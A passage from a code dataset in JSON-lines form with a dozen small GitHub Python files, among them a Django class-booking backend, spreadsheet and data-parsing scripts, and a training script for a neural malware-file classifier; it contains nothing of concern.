Cancelled Successfully!\")\n\n\n@api_view([\"POST\"])\n@csrf_exempt\ndef RemoveClasses(request):\n if request.method == \"POST\":\n if not request.user.is_superuser:\n return HttpResponse(\"Not Admin\", status=403)\n class_info = json.loads(request.body).get('body')\n name = class_info.get('name')\n if not Classes.objects.filter(name=name).exists():\n return HttpResponse(\"No such class exists!\")\n class_to_remove = Classes.objects.filter(name=name)\n class_to_remove.delete()\n return HttpResponse(\"Classes Cancelled Successfully!\")\n\n\n@api_view([\"GET\"])\n@csrf_exempt\ndef ListClasses(request, id):\n if request.method == \"GET\":\n studio = Studio.objects.get(id=id)\n if studio is None:\n return HttpResponse(\"No studio found\", status=404)\n now = datetime.datetime.now()\n order_class = Class.objects.filter(\n studio=studio).order_by('date', 'start_time')\n data = []\n for class_inst in order_class:\n print(class_inst.date, now.date(),\n class_inst.start_time, now.time())\n if class_inst.date > now.date():\n print(\"here\")\n class_info = {\"name\": class_inst.name, \"start_time\": class_inst.start_time,\n \"end_time\": class_inst.end_time, \"date\": class_inst.date}\n data.append(class_info)\n\n return JsonResponse(data, safe=False)\n\n\n@api_view([\"POST\"])\n@csrf_exempt\ndef EnrollClasses(request, id):\n if request.method == \"POST\":\n if not request.user.is_authenticated:\n print(\"Did not login\")\n return HttpResponse(\"Login in first to enroll a class!\", status=403)\n studio = Studio.objects.get(id=id)\n if studio is None:\n print(\"no such studio\")\n return HttpResponse(\"No studio found\", status=404)\n data = json.loads(request.body).get(\"data\")\n classes = Classes.objects.get(\n studio=studio, name=data.get(\"classname\"))\n if classes.capacity == 0:\n return HttpResponse(\"Enrolling failed! The class is full!\")\n else:\n user = request.user\n\n # user_logs = StripeUserLog.objects.all().filter(user_id=request.user.id)\n\n # stripe_customer_ids = []\n\n # for log in user_logs:\n # stripe_customer_ids.append(log.stripe_customer_id)\n\n # stripe_user = StripeUser.objects.all().filter(\n # user_id=user.id)\n\n # is_active = False\n\n # if len(stripe_user) != 0:\n # is_active = True\n # if not is_active:\n # return HttpResponse(\"Need subscribe first to enroll the class!\", status=403)\n\n # See if user has an unsubscribed subscription that is still valid\n\n user_logs = StripeUserLog.objects.all().filter(user_id=request.user.id)\n\n stripe_customer_ids = []\n\n for log in user_logs:\n stripe_customer_ids.append(log.stripe_customer_id)\n\n has_subscription = False\n\n for customer_id in stripe_customer_ids:\n invoices = stripe.Invoice.list(customer=customer_id).data\n for invoice in invoices:\n if invoice.lines.data[0].period.end >= time.time():\n has_subscription = True\n\n if not has_subscription:\n return HttpResponse(\"Need subscribe first to enroll the class!\", status=403)\n\n else:\n print(\"enroll here\")\n new_cap = classes.capacity - 1\n classes.capacity = new_cap\n user.classes.add(classes)\n class_lst = Class.objects.filter(classes=classes)\n stripe_user = StripeUser.objects.all().filter(\n user_id=user.id)\n user_logs = StripeUserLog.objects.all().filter(user_id=user.id)\n stripe_customer_ids = []\n\n for log in user_logs:\n stripe_customer_ids.append(log.stripe_customer_id)\n\n end_period = None\n\n for customer_id in stripe_customer_ids:\n invoices = stripe.Invoice.list(customer=customer_id).data\n for invoice in invoices:\n if invoice.lines.data[0].period.end >= time.time():\n timestamp = invoice.lines.data[0].period.end\n end_period = datetime.datetime.fromtimestamp(\n timestamp).date()\n\n for class_inst in class_lst:\n if class_inst.date < end_period:\n user.class_lst.add(class_inst.id)\n user.save()\n print(user.class_lst)\n print(user.classes)\n return HttpResponse(\"Enroll in class successfully!\")\n\n\n@api_view([\"POST\"])\n@csrf_exempt\ndef DeleteClasses(request):\n if request.method == \"POST\":\n # user = User.objects.get(username=info.get(\"username\"))\n user = request.user\n if not user.is_authenticated:\n return HttpResponse(\"Login in first to quit a class!\", status=403)\n info = json.loads(request.body)\n if user is None:\n return HttpResponse(\"No such user!\", status=404)\n user_classes_lst = user.classes\n user_class_lst = user.class_lst\n classes = Classes.objects.get(name=info.get(\"classname\"))\n user_classes_lst.remove(classes)\n class_lst = Class.objects.filter(name=info.get(\"classname\"))\n for class_inst in class_lst:\n user_class_lst.remove(class_inst)\n\n new_cap = classes.capacity + 1\n classes.capacity = new_cap\n return HttpResponse(\"Class dropped successfully!\")\n\n\n@api_view([\"POST\"])\n@csrf_exempt\ndef DeleteClass(request):\n if request.method == \"POST\":\n user = request.user\n if not user.is_authenticated:\n return HttpResponse(\"Login in first to delete a class!\", status=403)\n info = json.loads(request.body)\n if user is None:\n return HttpResponse(\"No such user!\", status=404)\n user_class_lst = user.class_lst\n date_raw = info.get(\"date\")\n year = date_raw[\"year\"]\n month = date_raw[\"month\"]\n day = date_raw[\"day\"]\n class_date = datetime.date(year, month, day)\n class_to_delete = Class.objects.get(\n name=info.get(\"classname\"), date=class_date)\n if class_to_delete is None:\n return HttpResponse(\"No class session found!\")\n user_class_lst.remove(class_to_delete)\n return HttpResponse(\"Class session delete successfully!\")\n\n\n@api_view([\"GET\"])\n@csrf_exempt\ndef UserSchedule(request):\n if request.method == \"GET\":\n if not request.user.is_authenticated:\n return HttpResponse(\"Login in first to view schedule!\", status=403)\n # info = json.loads(request.body)\n # user = User.objects.get(username=info.get(\"username\"))\n user = request.user\n now = datetime.datetime.now()\n print(request.user)\n order_class = user.class_lst.order_by('date', 'start_time')\n data = []\n for class_inst in order_class:\n if class_inst.date > now.date():\n class_info = {\"name\": class_inst.name, \"start_time\": class_inst.start_time,\n \"end_time\": class_inst.end_time, \"date\": class_inst.date}\n data.append(class_info)\n\n return JsonResponse(data, safe=False)\n\n\n@api_view([\"GET\"])\n@csrf_exempt\ndef SearchClass(request, id):\n if request.method == \"GET\":\n studio = Studio.objects.get(id=id)\n if studio is None:\n return HttpResponse(\"No studio found\", status=404)\n search_key = json.loads(request.body)\n coach = search_key.get(\"coach\")\n class_name = search_key.get(\"classname\")\n\n class_lst = Class.objects.filter(studio=studio)\n if coach is not None:\n class_lst = class_lst.filter(coach=coach)\n\n if class_name is not None:\n class_lst = class_lst.filter(name=class_name)\n\n date_raw = search_key.get(\"date\")\n if date_raw is not None:\n date = datetime.date(\n date_raw[\"year\"], date_raw[\"month\"], date_raw[\"day\"])\n class_lst = class_lst.filter(date=date)\n\n data = []\n\n start_raw = search_key.get(\"start\")\n end_raw = search_key.get(\"end\")\n if start_raw is not None and end_raw is not None:\n start = datetime.time(start_raw[\"hour\"], start_raw[\"minute\"])\n end = datetime.time(end_raw[\"hour\"], end_raw[\"minute\"])\n for class_inst in class_lst:\n if class_inst.start_time > start and class_inst.end_time < end:\n class_info = {\"name\": class_inst.name, \"start_time\": class_inst.start_time,\n \"end_time\": class_inst.end_time, \"date\": class_inst.date}\n data.append(class_info)\n\n if start_raw is not None and end_raw is None:\n start = datetime.time(start_raw[\"hour\"], start_raw[\"minute\"])\n for class_inst in class_lst:\n if class_inst.start_time > start:\n class_info = {\"name\": class_inst.name, \"start_time\": class_inst.start_time,\n \"end_time\": class_inst.end_time, \"date\": class_inst.date}\n data.append(class_info)\n\n if start_raw is None and end_raw is not None:\n end = datetime.time(end_raw[\"hour\"], end_raw[\"minute\"])\n for class_inst in class_lst:\n if class_inst.end_time < end:\n class_info = {\"name\": class_inst.name, \"start_time\": class_inst.start_time,\n \"end_time\": class_inst.end_time, \"date\": class_inst.date}\n data.append(class_info)\n\n if start_raw is None and end_raw is None:\n for class_inst in class_lst:\n class_info = {\"name\": class_inst.name, \"start_time\": class_inst.start_time,\n \"end_time\": class_inst.end_time, \"date\": class_inst.date}\n data.append(class_info)\n\n return JsonResponse(data, safe=False)\n\n\n@api_view([\"POST\"])\n@csrf_exempt\ndef SearchClasses(request, id):\n if request.method == \"POST\":\n studio = Studio.objects.get(id=id)\n if studio is None:\n return HttpResponse(\"No studio found\", status=404)\n search_key = json.loads(request.body).get(\"body\")\n print(search_key)\n coach = search_key.get(\"coach\")\n class_name = search_key.get(\"classname\")\n class_lst = Class.objects.filter(studio=studio)\n if coach is not None and coach != '':\n class_lst = class_lst.filter(coach=coach)\n\n if class_name is not None and class_name != \"\":\n class_lst = class_lst.filter(name=class_name)\n\n date_raw = search_key.get(\"date\")\n if date_raw is not None:\n if date_raw[\"year\"] is not None:\n date = datetime.date(\n date_raw[\"year\"], date_raw[\"month\"], date_raw[\"day\"])\n class_lst = class_lst.filter(date=date)\n\n data = []\n\n start_raw = search_key.get(\"start_time\")\n end_raw = search_key.get(\"end_time\")\n if start_raw is not None and end_raw is not None:\n if start_raw[\"hour\"] is not None and end_raw[\"hour\"] is not None:\n print(\"start end here\")\n start = datetime.time(start_raw[\"hour\"], start_raw[\"minute\"])\n end = datetime.time(end_raw[\"hour\"], end_raw[\"minute\"])\n for class_inst in class_lst:\n if class_inst.start_time > start and class_inst.end_time < end:\n class_info = {\"name\": class_inst.name, \"start_time\": class_inst.start_time,\n \"end_time\": class_inst.end_time, \"date\": class_inst.date}\n data.append(class_info)\n\n if start_raw is not None and end_raw is None:\n if start_raw[\"hour\"] is not None:\n print(\"start here\")\n start = datetime.time(start_raw[\"hour\"], start_raw[\"minute\"])\n for class_inst in class_lst:\n if class_inst.start_time > start:\n class_info = {\"name\": class_inst.name, \"start_time\": class_inst.start_time,\n \"end_time\": class_inst.end_time, \"date\": class_inst.date}\n data.append(class_info)\n\n if start_raw is None and end_raw is not None:\n if end_raw[\"hour\"] is not None:\n print(\"end here\")\n end = datetime.time(end_raw[\"hour\"], end_raw[\"minute\"])\n for class_inst in class_lst:\n if class_inst.end_time < end:\n class_info = {\"name\": class_inst.name, \"start_time\": class_inst.start_time,\n \"end_time\": class_inst.end_time, \"date\": class_inst.date}\n data.append(class_info)\n\n if start_raw is None and end_raw is None:\n print(\"none here\")\n for class_inst in class_lst:\n class_info = {\"name\": class_inst.name, \"start_time\": class_inst.start_time,\n \"end_time\": class_inst.end_time, \"date\": class_inst.date}\n data.append(class_info)\n\n if data is None:\n return JsonResponse(data, safe=False)\n else:\n classes = dict()\n for class_inst in data:\n classes[class_inst[\"name\"]] = {\"start_time\": class_inst[\"start_time\"],\n \"end_time\": class_inst[\"end_time\"]}\n\n classes_data = []\n for key in classes.keys():\n curr = Classes.objects.get(name=key)\n\n keyword_lst = []\n for keyword in curr.keywords.all():\n keyword_lst.append(keyword.keyword)\n classes_info = {\"classname\": key, \"description\": curr.description, \"coach\": curr.coach,\n \"weekday\": curr.weekday, \"keywords\": keyword_lst,\n \"start\": classes.get(key)[\"start_time\"], \"end\": classes.get(key)[\"end_time\"]}\n classes_data.append(classes_info)\n\n return JsonResponse(classes_data, safe=False)\n","repo_name":"michael-j-rubenstein/CSC309-Backend","sub_path":"classes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":20805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"29751173231","text":"import numpy # used only for testing\n\n\ndef change_probability_by_a_percentage(probability, percentage):\n assert -100 < percentage\n odds = convert_probability_to_odds(probability)\n newOdds = increase_odds_by_a_percentage(odds, percentage)\n newProbability = convert_odds_to_probabilitiy(newOdds)\n return newProbability\n \n\n#helper function\ndef convert_probability_to_odds(probability):\n '''returns the odds in proportion to one. \n i.e. X to Y, where Y = 1, this function returns X\n ex: probability=.8, odds = 4:1 --> returns 4.0\n if probability = 1, returns float('Inf')'''\n assert 0 <= probability <= 1, \"Probability must be between 0 and 1, inclusive\"\n try:\n return probability/(1.-probability)\n except ZeroDivisionError:\n return float('Inf')\n \n#helper function\ndef increase_odds_by_a_percentage(odds, percentage):\n percentAsDecimal = percentage/100.\n\n return odds * (1.+percentAsDecimal)\n \n#helper function\ndef convert_odds_to_probabilitiy(odds):\n if odds == float('Inf'):\n return 1.0\n return odds/(1.+odds)\n \n\ndef test_change_probability_by_a_percentage():\n methodToTest = change_probability_by_a_percentage\n # increase probability\n assert methodToTest(.5, 0) == .5\n assert methodToTest(.6, 100) == .75\n assert methodToTest(.1, 3000) == .775 \n assert methodToTest(1, 3000) == 1.0 \n assert methodToTest(1, 0) == 1.0\n assert methodToTest(1., 7) == 1.0 \n\n # decrease probability\n assert methodToTest(.5, -75) == .2\n assert methodToTest(.75, -50) == .6\n assert methodToTest(.1, -40) == .0625\n assert methodToTest(1, -10) == 1.0\n assert methodToTest(1., -7) == 1.0\n \n # compare to bayes_approach_change_probability_by_a_percentage\n tolerance = .000000001\n methodToTestAgainst = bayes_approach_change_probability_by_a_percentage\n for prob in numpy.arange(0.1, 1.1, .1):\n for perc in numpy.arange(-99.9,200,.1):\n assert abs(methodToTest(prob, perc) - methodToTestAgainst(prob, perc)) < tolerance\n \n\ndef bayes_approach_change_probability_by_a_percentage(probability, percentage):\n return probability/(probability+(((percentage/100.)+1)**-1)*(1-probability))\n\ntest_change_probability_by_a_percentage()\n\n\n","repo_name":"CodeProgress/Useful_Methods","sub_path":"ChangeProbabilityByAPercentage.py","file_name":"ChangeProbabilityByAPercentage.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"15925022463","text":"from rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom Backend.models import VisitationLog, Item\nfrom ...serializers import *\nfrom rest_framework_simplejwt.authentication import JWTAuthentication\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework import status\n\n\nclass VisitationLogList(APIView):\n\n serializer_class = VisitationLogSerializer\n \n authentication_classes = [JWTAuthentication]\n permission_classes = [IsAuthenticated]\n\n def post(self, request, format=None):\n\n log_serializer = VisitationLogSerializer(data=request.data)\n\n if log_serializer.is_valid():\n\n seller_id = Item.objects.get(id=log_serializer.data['item_id']).seller_user_id\n\n if not seller_id == log_serializer.data['user_id']:\n try:\n log = VisitationLog.objects.get(user_id_id=log_serializer.data['user_id'], item_id_id=log_serializer.data['item_id'])\n log.count += 1\n log.save()\n return Response(status=status.HTTP_201_CREATED)\n\n except VisitationLog.DoesNotExist:\n VisitationLog.objects.create(user_id_id=log_serializer.data['user_id'], item_id_id=log_serializer.data['item_id'], recommendation=log_serializer.data['recommendation'], count=1)\n return Response(status=status.HTTP_201_CREATED)\n\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n\nclass AcquireRecommendations(APIView):\n\n authentication_classes = [JWTAuthentication]\n permission_classes = [IsAuthenticated]\n\n def get(self, request, format=None):\n\n try:\n top_recommendations = VisitationLog.objects.filter(user_id=request.user.id, count__lte=1).order_by(\"-recommendation\").values()\n \n item_ids = []\n for rec in top_recommendations:\n item_ids.append(rec[\"item_id_id\"])\n \n filtered_items = Item.objects.filter(id__in=item_ids).exclude(seller_user_id=request.user.id)\n\n recommendedItems = []\n rec_counter = 0\n\n for item_id in item_ids:\n if not Item.objects.filter(id=item_id, seller_user_id=request.user.id).exists():\n recommendedItems.append(filtered_items.get(id=item_id))\n rec_counter += 1\n if rec_counter == 6:\n break\n\n serializer = ItemSerializer(recommendedItems, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n \n except Exception:\n return Response(status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n","repo_name":"Aggelos561/Bidding-Website","sub_path":"Backend/RestFramework/VisitationLogs/visitationLog.py","file_name":"visitationLog.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"30933280354","text":"\n# from openpyxl import Workbook\nfrom openpyxl import load_workbook\nimport tkinter\n\nclass ListItem:\n def __init__(self, code, name):\n self.code = code\n self.name = name\n\n\nclass Entry:\n def __init__(self, row):\n self.deptCode = row[0].value\n self.deptName = row[1].value\n self.nominalCode = row[2].value\n self.nominalName = row[3].value\n self.date = row[4].value\n self.narrative = row[5].value\n self.blank = row[6].value\n self.transValue = row[7].value\n self.cat = row[8].value\n\n\ndef printSheetTitles(wb):\n for sheet in wb:\n print(sheet.title)\n\n\ndef getRow(ws, rowno):\n newRow = ws[rowno]\n # for item in newRow:\n # print(item.value)\n # print(newRow)\n return newRow\n\n\ndef printvalues(ws):\n for row in ws.values:\n for value in row:\n print(value)\n\n\ndef categorise(ws):\n for i in range(1, ws.max_row):\n cell = ws.cell(i, 3)\n if (cell.value == 7003) or (cell.value == 7006) or (cell.value == 7007):\n ws.cell(i, 9, 'Staff Costs')\n if cell.value == 5032:\n ws.cell(i, 9, 'Equipment')\n if (cell.value == 7307) or (cell.value == 7311) or (cell.value == 7312):\n ws.cell(i, 9, 'Travel')\n\n\ndef searchByNominal(entryList, nominalCode):\n filteredList = []\n for item in entryList:\n if item.nominalCode == nominalCode:\n filteredList.append(item)\n return filteredList\n\n\ndef save(wb, name):\n wb.save(name)\n\n\ndef printrows(ws):\n for row in ws.iter_rows(min_row=1, max_col=ws.max_column, max_row=ws.max_row, values_only=True):\n print(row)\n\n\ndef sumcat(ws, cat):\n catsum = 0\n for i in range(1, ws.max_row):\n cell = ws.cell(i, 9)\n if cell.value == cat:\n cell = ws.cell(i, 8)\n catsum = catsum + cell.value\n string = (cat + ' Total : ' + str(catsum))\n return string\n\n\n\ndef getNominalList(ws):\n nominalList = []\n initCode = ws.cell(1, 3).value\n initName = ws.cell(1, 4).value\n\n for i in range (2, ws.max_row):\n nominalCode = ws.cell(i, 3).value\n nominalName = ws.cell(i, 4).value\n\n\ndef sumdept(ws, dept):\n deptsum = 0\n for i in range(1, ws.max_row):\n cell = ws.cell(i, 1)\n if cell.value == dept:\n cell = ws.cell(i, 8)\n name = ws.cell(i, 2).value\n deptsum += cell.value\n string = (name + ' Total : ' + str(deptsum))\n return string\n\n\ndef getList(ws, codeCol, nameCol):\n list = []\n initCode = ws.cell(1, codeCol).value\n initName = ws.cell(1, nameCol).value\n list.append(ListItem(initCode, initName))\n for i in range(2, ws.max_row):\n itemCode = ws.cell(i, codeCol).value\n itemName = ws.cell(i, nameCol).value\n # newDept = Department(deptCode, deptName)\n # deptList.append(newDept)\n for item in list:\n found = False\n if item.code == itemCode:\n found = True\n if found == False:\n newItem = ListItem(itemCode, itemName)\n list.append(newItem)\n return list\n\n\ndef printList(list):\n print(\"No. of List Items: \" + str(list.__len__()))\n for item in list:\n print(str(item.code) + \" \" + item.name)\n\n\ndef writeList(ws, list, row, column, sheetname):\n newWs = wb.create_sheet(sheetname)\n i = 0\n for item in list:\n newWs.cell(row + i, column).value = item.code\n newWs.cell(row + i, column + 1).value = item.name\n i += 1\n\n\ndef createEntries(ws):\n entryList = []\n for i in range (1, ws.max_row):\n newEntry = Entry(getRow(ws, i))\n entryList.append(newEntry)\n print(entryList.__len__())\n return entryList\n\n\ndef writeEntryList(entryList, col1, sheetname):\n newWs = wb.create_sheet(sheetname)\n for i in range(1, entryList.__len__()):\n newWs.cell(i, 1).value = entryList[i].nominalCode\n newWs.cell(i, 2).value = entryList[i].transValue\n\n\n\nfilename = input('File name? : ')\noutput = input('Output file :') + '.xlsx'\nwb = load_workbook(filename + '.xlsx')\nws = wb['Sheet1']\ncategorise(ws)\ndeptlist = getList(ws, 1, 2)\nnominalList = getList(ws, 3, 4)\nwriteList(ws, deptlist, 1, 1, 'Departments')\nwriteList(ws, nominalList, 1, 1, 'Nominals')\nentryList = createEntries(ws)\n# staffCosts = searchByNominal(entryList, 7003)\nwriteEntryList(searchByNominal(entryList, 7003), 1, 'Entries')\nsave(wb, output)\nprint(sumcat(ws, 'Staff Costs'))\nprint(sumdept(ws, 101))\nprintList(deptlist)\nprintList(nominalList)\n\n\n","repo_name":"Sheep83/sheetTest","sub_path":"sheetTest.py","file_name":"sheetTest.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"17100216206","text":"\nm_cmd = {\n\t'initBle' : {},\n\t'stopScan' : {},\n\t'connectDevice' : {'address': '22:22:22:22:22:22'},\n\t'disconnectDevice' : {},\n\t'requestMtu' : {'mtuSize': 512},\n\t'discoverServices' : {},\n\t'scanDevice' : {},\n\t'cancelBondProcess' : {},\n\t'cancelPairing' : {},\n\t'connectGatt' : {'context': None, 'autoConnect': False, 'callback': None, 'transport':'TRANSPORT_LE', 'phy': 'PHY_LE_1M_MASK' ,'handler':None},\n\t'createBond' : {},\n\t'createInsecureL2capChannel' : {'psm': None},\n\t'createInsecureRfcommSocketToServiceRecord' : {'uuid' : None},\n\t'createL2capChannel' : {'psm': None},\n\t'createRfcommSocketToServiceRecord' : {'uuid': None},\n}\n\nm_hook = [\n\t'BluetoothGattService', 'BleDevice'\n]","repo_name":"eaglelaw/runcase","sub_path":"case_ble/cmd_list.py","file_name":"cmd_list.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"28371299990","text":"n=int(input())\n\ncount=0\nwhile True:\n if n>=500:\n count+=n//500\n n%=500\n elif n>=100:\n count+=n//100\n n%=100\n elif n>=50:\n count+=n//50\n n%=50\n elif n>=10:\n count+=n//10\n break \nprint(count)\n\n# 정답\n\nn=1260\ncount=0\n\ncoin_types=[500,100,50,10]\n\nfor coin in coin_types:\n count += n//coin\n n%=coin\n\nprint(count)","repo_name":"jacey-h/Programming-language","sub_path":"Python_code/Greedy/3-1_거스름돈.py","file_name":"3-1_거스름돈.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"9648596172","text":"import sysconfig\n\nfrom setuptools import setup\nfrom setuptools.extension import Extension\n\n\nclass get_pybind_include(object):\n def __init__(self, user=False):\n self.user = user\n\n def __str__(self):\n import pybind11\n\n return pybind11.get_include(self.user)\n\n\nsetup(\n name=\"pysarplus\",\n version=\"0.2.6\",\n description=\"SAR prediction for use with PySpark\",\n url=\"https://github.com/Microsoft/Recommenders/contrib/sarplus\",\n author=\"Markus Cozowicz\",\n author_email=\"marcozo@microsoft.com\",\n license=\"MIT\",\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3.4\",\n \"Programming Language :: Python :: 3.5\",\n \"Programming Language :: Python :: 3.6\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Science/Research\",\n \"Topic :: Scientific/Engineering :: Mathematics\",\n ],\n setup_requires=[\"pytest-runner\"],\n install_requires=[\"pybind11>=2.2\"],\n tests_require=[\"pytest\"],\n packages=[\"pysarplus\"],\n ext_modules=[\n Extension(\n \"pysarplus_cpp\",\n [\"src/pysarplus.cpp\"],\n include_dirs=[get_pybind_include(), get_pybind_include(user=True)],\n extra_compile_args=sysconfig.get_config_var(\"CFLAGS\").split()\n + [\"-std=c++11\", \"-Wall\", \"-Wextra\"],\n libraries=[\"stdc++\"],\n language=\"c++11\",\n )\n ],\n zip_safe=False,\n)\n","repo_name":"tsinghua-fib-lab/SIGIR21-SURGE","sub_path":"contrib/sarplus/python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"70"}
+{"seq_id":"9260353702","text":"import Preprocessor\nimport Utils\nimport Classifier_FCN\nfrom sklearn import preprocessing\nimport numpy as np\n\nif __name__ == \"__main__\":\n config = Utils.readjson(\"config.json\")\n Transformer = Preprocessor.Transformer(\n config[\"advanced\"][\"img_width\"], config[\"advanced\"][\"img_height\"])\n Classifier = Classifier_FCN.Classifier_FCN(\n config[\"advanced\"][\"input_shape\"],\n config[\"model\"][\"nb_classes\"],\n config[\"model\"][\"model_path\"]\n )\n enc = preprocessing.OneHotEncoder()\n enc.fit(np.array(range(config[\"model\"][\"nb_classes\"])).reshape(-1, 1))\n train_size = config[\"data\"][\"train_size\"]\n count = 0\n\n mal_datasets = Utils.scan_file(config[\"data\"][\"mal_train_dataset_dir\"])[0]\n mal_train_datasets = []\n for dataset in mal_datasets:\n\n flag = 0\n for types in config[\"data\"][\"support_type\"]:\n if dataset.find(types) >= 0:\n count = count + 1\n flag = 1\n break\n if flag:\n mal_train_datasets.append(dataset)\n if count > train_size/2:\n break\n\n count = 0\n nor_datasets = Utils.scan_file(config[\"data\"][\"nor_train_dataset_dir\"])[0]\n\n nor_train_datasets = []\n for dataset in nor_datasets:\n flag = 0\n for types in config[\"data\"][\"support_type\"]:\n if dataset.find(types) >= 0:\n flag = 1\n count = count + 1\n break\n if flag:\n nor_train_datasets.append(dataset)\n if count > train_size/2:\n break\n\n y_train = []\n x_train = []\n print(len(nor_train_datasets))\n print(len(mal_train_datasets))\n for i in nor_train_datasets:\n y_train.append(0)\n matrix = Transformer.Load_file(\n config[\"data\"][\"nor_train_dataset_dir\"]+i)\n img = Transformer.transform(matrix)\n img = np.array(img).reshape(\n (config[\"advanced\"][\"img_width\"], config[\"advanced\"][\"img_height\"], 1))\n x_train.append(img)\n print(i+\"\\t0\")\n print(\"读取普通文件结束\")\n for i in mal_train_datasets:\n y_train.append(1)\n matrix = Transformer.Load_file(\n config[\"data\"][\"mal_train_dataset_dir\"]+i)\n img = Transformer.transform(matrix)\n img = np.array(img).reshape(\n (config[\"advanced\"][\"img_width\"], config[\"advanced\"][\"img_height\"], 1))\n x_train.append(img)\n print(i+\"\\t1\")\n print(\"读取恶意文件结束\")\n y_train = enc.transform(np.array(y_train).reshape(-1, 1)).toarray()\n x_train = np.array(x_train)\n\n Classifier.fit(x_train, y_train,\n config[\"model\"][\"batch_size\"], config[\"model\"][\"epoch\"])\n\n print(\"训练结束\")\n","repo_name":"whulizheng/Malware-Detection-Using-NN","sub_path":"Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":2741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"7614038809","text":"from django.shortcuts import render,redirect\nfrom vehiculos.models import Vehiculo\nfrom clientes.models import Cliente\nfrom django.http.response import JsonResponse\n\nfrom .forms import VehiculoForm\n\n# Create your vie ws here.\ndef list_vehiculos_clientes(requets,id):\n cliente = Cliente.objects.get(id=id)\n vehiculos =Vehiculo.objects.filter(cliente_id=id)\n print(vehiculos)\n return render(\n request=requets,\n template_name='vehiculos/lista.html',\n context={\n 'vehiculos':vehiculos,\n 'cliente':cliente\n }\n )\n\ndef get_vehiculos_clientes(requets,id):\n vehiculos =Vehiculo.objects.filter(cliente_id=id).values()\n response={\n 'vehiculos':list(vehiculos)\n }\n return JsonResponse(response)\n\n\ndef nuevo_vehiculo(request,idCliente):\n cliente = Cliente.objects.get(id=idCliente)\n formulario = VehiculoForm(request.POST or None)\n if formulario.is_valid():\n formulario.save()\n return redirect('clientes')\n\n return render(\n request=request,\n template_name='vehiculos/crear.html',\n context={\n 'formulario':formulario,\n 'cliente':cliente\n }\n ) \n\n","repo_name":"Estuardo-Sazo/taller-django","sub_path":"vehiculos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"10748948671","text":"import re\n\n\n0_0 # Python >= 3.6 is required\n\ndef fix_color(s):\n match = re.match(r'^rgb[(](\\d+[.]\\d+)%, (\\d+[.]\\d+)%, (\\d+[.]\\d+)%[)]$', s)\n result = ['#']\n for i in range(1, 4):\n v = match.group(i)\n v = float(v)\n v = int(15 * v / 100.0)\n v = f'{v:x}'\n result += [v]\n return ''.join(result)\n\n__all__ = ['fix_color']\n\n# vim:ts=4 sts=4 sw=4 et\n","repo_name":"jwilk/xtsd-toolbox","sub_path":"libxtsd.py","file_name":"libxtsd.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"1020442621","text":"import json\n\ndef mapIds():\n champMap = {}\n with open('./champion.json', encoding='utf-8') as file:\n x = file.read()\n x = json.loads(x)\n championList = x['data']\n for champ in championList:\n champKey = x['data'][champ]['key']\n champMap[champKey] = champ\n #print(champMap)\n with open('../src/api/dataDragon/champIds.json', 'w') as json_file:\n json.dump(champMap, json_file)\n\n\nmapIds()","repo_name":"JasonObeid/josh-ints.me","sub_path":"dataDragonSrc/getChampIds.py","file_name":"getChampIds.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"72443971108","text":"from __future__ import division, print_function\n\n__author__ = \"adrn \"\n\n# Standard library\nimport os, sys\nimport json\nimport glob\nimport re\n\n#pattr = re.compile(r\"[0-9]{3}\\.[0-9]{2,3}.*$\")\npattr = re.compile(r\"([0-9]{3}\\.[0-9]{2,3})(.*)\")\n\nexpr1 = r\"([A-Za-z\\.]+\\s(?:(?:[A-Za-z]\\.)|(?:[A-Za-z]+))\\s[A-Za-z]+\\s*[0-9]\\,.*)\"\nbad_pattr1 = re.compile(expr1)\nexpr2 = r\"([A-Za-z\\.]+\\s(?:(?:[A-Za-z]\\.)|(?:[A-Za-z]+))\\s[A-Za-z]+\\s*[0-9].*)\"\nbad_pattr2 = re.compile(expr2)\n\nwith open(\"data/aas_abstracts.json\") as f:\n data = json.loads(f.read())\n\nfor ii,filename in enumerate(glob.glob(\"data/aas*.txt\")):\n with open(filename) as f:\n text = f.read()\n\n nfailures = 0\n ntotal = 0\n presentations = dict()\n for jj,match in enumerate(pattr.finditer(text)):\n ntotal += 1\n title = match.groups()[1]\n title = title[2:]\n #m = bad_pattr.search(title)\n #if m is not None or len(title) > 500:\n # if m is not None:\n # print(m.groups())\n if len(title) > 500:\n nfailures += 1\n continue\n\n if ',' in title and '.' in title:\n try:\n groups = bad_pattr1.search(title).groups()\n except:\n try:\n groups = bad_pattr2.search(title).groups()\n except:\n nfailures += 1\n continue\n title = title.replace(groups[0],'')\n\n presentations[jj] = 